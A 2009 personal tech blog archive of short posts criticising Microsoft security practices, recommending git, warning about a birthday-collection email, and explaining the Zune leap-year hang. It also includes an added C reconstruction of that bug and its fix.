-- Douglas Adams

(malware) Microsoft announces $250,000 Conficker worm bounty

I guess it's a lot cheaper than fixing the security of your own products... :-)

- why should a desktop have RPC and other ports open by default?
- why design a system where even a 'local administrator' cannot fix something (see http://isc.sans.org/diary.html?storyid=5842 )?
- and most importantly, why oh why does autorun.inf execute even for USB sticks?

http://www.networkworld.com/news/2009/021209-conflickr-bounty-microsoft.html

Quote: "By combining our expertise with the broader community, we can expand the boundaries of defense to better protect people worldwide," said George Stathakopoulos, general manager of Microsoft's Trustworthy Computing Group.

Translation: we have no clue how to deal with this without admitting we screwed up bigtime, and by co-opting all of you, we can pretend it's not really our fault.

2009-02-11

(git) git grep

Came up in my RSS feed earlier today... pretty powerful stuff

http://gitster.livejournal.com/27674.html

...and most of the power is nothing to do with version control per se
(except the aspect of grepping for stuff in older revisions)

2009-02-09

(MBA) a salesman speaks

I agree that socialising may lead to conceptualising. Maybe even, if you get (un)lucky -- pardon the mild salacity -- conception :-) But how do you "socialise a concept"?

It seems to me that, compared to sales guys, we lead such dull, drab, humorless lives. We write programs and think we're creating something. They change the very language in which we communicate, pulling the rugs from under our collective feet. And most of us don't even know it. Only a very few are even privileged to be in their presence, and that too by the most tenuous of connections -- a phone call.

Truly, they are masters of their destiny. And ours too...

God help us.

-------- Original Message --------


<deleted> and I will socialize this concept with these people and see when and how we can set up a possible workshop with

2009-02-07

(funny) Gates Releases more bugs into the world?

To highlight malaria awareness, Bill Gates apparently
released a bottle full of mosquitos at TED recently.

TED curator Chris Anderson joked that when the video is
posted on the TED website, it would be headlined "Gates
releases more bugs into the world."

http://www.theregister.co.uk/2009/02/05/gates_mosquitoes_ted_conference/

(criminal,malware) must have been my brother in some past life...

...well except for the little bit about Church of GNU anyway

http://tech.slashdot.org/comments.pl?sid=1117843&cid=26745339

2009-02-03

(criminals,malware) still don't feel like installing Linux?

Yes, gentle readers, we finally have a genuine swear word on this blog, not that namby-pamby "fsck" mis-spelling I trot out when I'm upset, so here goes...

The bastards at Microsoft have sunk to a new low.

If you're running Windows and have auto-update on, and you use firefox (because you know IE is full of holes), this is what you got some time ago:

- a firefox add-on you never asked for, from Microsoft, not from Mozilla
- which installs itself without asking, as part of Windows update
- and won't uninstall without forcing you to go into the registry editor

So -- if you installed firefox because it was more secure than IE -- MS has a plan to make sure FF is as fscked as IE is.

At least on Windows.

And please, for MS apologists: it doesn't matter *what* the fscking extension is actually doing. The fact that MS can

- install something onto a competing product
- without the user's permission, and
- (bonus) make it hard to uninstall without regedit

all adds up to an enormous amount of arrogance. You may have paid for your computer, but you don't actually own it -- they do.

Listen up guys, I've said this before and I'll say this again, loud and clear. AT LEAST ON YOUR HOME MACHINES, PLEASE INSTALL AND USE LINUX!! I'll help -- call me. I'll do anything to help people install and use it.

Some links:

2009-02-01

(malware) Interview with an Adware developer

http://www.schneier.com/blog/archives/2009/01/interview_with_10.html

quote from linked article:

I should probably first speak about how adware works.
Most adware targets Internet Explorer (IE) users because
obviously they're the biggest share of the market. In
addition, they tend to be the less-savvy chunk of the
market. If you're using IE, then either you don't care
or you don't know about all the vulnerabilities that IE
has.

2009-01-23

(photography) Long Exposure Photography: 15 Stunning Examples

http://digital-photography-school.com/long-exposure-photography

(git) must read article on git

http://www.theregister.co.uk/2009/01/21/git_gaining_ground/print.html

Please ignore the bad language; El Reg is not known for being "business like", but they know their stuff.

Some quotes:

  • Many enterprise developers just saw git's popularity as open source programmers suckling from the teat of Linus, but it kept growing. Programmers started to use git for their side projects and got hooked.
  • Git is gaining traction because given all other source control systems out there, git is the superior technology.
  • Developers will almost always select the best technology, and management must be dragged along kicking and screaming. It's no surprise that while git is making some headway in the enterprise, sometimes it's very under-the-radar and slow going.
  • You can use git to manage all the source code on your machine, and to keep the PHBs happy, commit your finished product to Subversion without actually using Subversion. This "guerrilla git" movement is springing up around the world, as developers see the productivity boost they can gain, but don't want to undo it with a productivity loss in convincing the company to officially switch to git.
  • So, if you're a developer and you haven't seen git before, there's a good possibility that you'll get a first hand demonstration when it starts to invade your company. If you like it, chances are it will help you get more work done in less time.

2009-01-13

(malware,office) Forrester: Companies use Word out of habit, not necessity

http://pcworld.idg.com.au/article/272644

lovely article!

The value of a high-priced analyst firm like Forrester is that, while
you can state the obvious as well as they can, no one listens when you do.

:-)

2009-01-12

(standards) Microsoft disables automatic IE 8 downloads

Last week someone was saying that many current Windows-based client-server applications that use a proprietary front-end called IE might be forced to upgrade and actually become what they currently only claim to be -- proper "web applications".

And then along comes this, to dash all hopes:

http://www.theregister.co.uk/2009/01/07/internet_explorer_8_blocker/

Especially note:

In a sign of the scale of the problem, Microsoft said the IE 8 Blocker does not have an expiration date. That means that until there's an official change of policy by Microsoft, users will not be getting IE 8 by default and will need to go on installing the software themselves.

2009-01-07

(social malware) Fwd: Birthday request

On Wed, Jan 7, 2009 at 2:32 PM, <deleted> <do_not_reply@perfspot.com> wrote:
> I'm using a new service to keep track of the birthdays for my friends and
> family. Please click the link and enter your birthday for me.
>
> http://perfspot.com/b.asp?e=sitaramc%40gmail%2Ecom
>
> Thanks for your help.
>
> <deleted>

As a security guy, my first thought is that this is probably a scam to get lots of people's birthdays. Even if it is not *created* as a scam, all it takes is for someone to hack into their servers and get all that data.

Do you know that, in the US at least, I can get a credit card in your name by knowing only
- your full name
- your DOB
- and your SSN?

OK, we in India are a little behind, but not that far off, and the awareness is much less.

So, sorry -- even if you *know* my birthday, please do not put it on any online service to "remind you" of it.

I will not feel bad that you did not wish me, I promise :-)

2009-01-05

(malware bugs) Zune hang explained...

Recently a Microsoft equivalent of the "iPod" (called the Zune) was found to
hang if it was booted on December 31st of 2008. The only solution was
to let the battery die, wait for the next day, and then reboot.

You'd think the cause might be something complex, deep in some really
arcane bit of the software, right?

Wrong! It's a piece of code that is so utterly simple even first year
college kids barely starting "C" should be able to understand the problem.

http://www.aeroxp.org/2009/01/lesson-on-infinite-loops/ explains the
cause of the hang very nicely. The actual code is very simple: given
the "number of days since Jan 1, 1980" as input, return the current year
and the day-number within the current year. That's it. It even has a
helper function called "IsLeapYear()" to help it decide, so it's a very
simple, short, piece of code. Yet it got it wrong...
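An added example, not the page's or the linked article's code: a reconstruction of the loop shape described above (days since Jan 1 1980 in, year and day-of-year out, with an IsLeapYear() helper), given an extra iteration guard so the stall can be observed instead of hanging, next to a corrected version where every pass makes progress. The function names, the guard parameter and the constructed day counts are my assumptions.

```c
#define ORIGIN_YEAR 1980   /* day 1 is 1980-01-01 (assumed convention) */

/* Gregorian leap-year rule; the helper the page mentions. */
static int IsLeapYear(int year)
{
    return (year % 4 == 0 && year % 100 != 0) || year % 400 == 0;
}

/* Reconstruction of the buggy loop shape (not copied from the page or the
 * driver). On the last day of a leap year days == 366: the outer test
 * passes, the inner test fails, nothing changes, so the loop never exits.
 * max_iters is an added guard so the stall can be shown without hanging.
 * Returns the year and stores the day-of-year, or returns 0 if the loop
 * stopped making progress. */
int zune_year_buggy(int days, int *day_out, int max_iters)
{
    int year = ORIGIN_YEAR;
    while (days > 365) {
        if (max_iters-- == 0)
            return 0;                    /* would spin forever */
        if (IsLeapYear(year)) {
            if (days > 366) {
                days -= 366;
                year++;
            }                            /* days == 366: no progress */
        } else {
            days -= 365;
            year++;
        }
    }
    *day_out = days;
    return year;
}

/* Corrected: compare against the current year's length, so each pass
 * either exits or strictly decreases days. Returns the year. */
int zune_year_fixed(int days, int *day_out)
{
    int year = ORIGIN_YEAR;
    int year_len = IsLeapYear(year) ? 366 : 365;
    while (days > year_len) {
        days -= year_len;
        year++;
        year_len = IsLeapYear(year) ? 366 : 365;
    }
    *day_out = days;
    return year;
}
```

With day 10593 (2008-12-31 under the day-1 convention above) the buggy loop reaches year 2008 with days == 366 and then spins, while the fixed version returns 2008, day 366.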

(git) one of the best responses on git versus svn I ever saw

http://developers.slashdot.org/comments.pl?sid=1079921&cid=26321869

explains a DVCS workflow really well, including the common question of "how do we control things if everyone has their own repo?"

2009-01-01

(funny,quote) The Berkeley of Linux...

I love this quote: "...the Debian project is the Berkeley of Linux: twice as many opinions as people, and four times as loud..."

[It's from http://www.linuxtoday.com/news_story.php3?ltsn=2008-12-31-022-35-OP-DV but I must say I'm a little ambivalent on the issues raised in there; need to dig deeper into the background before I make up my mind.]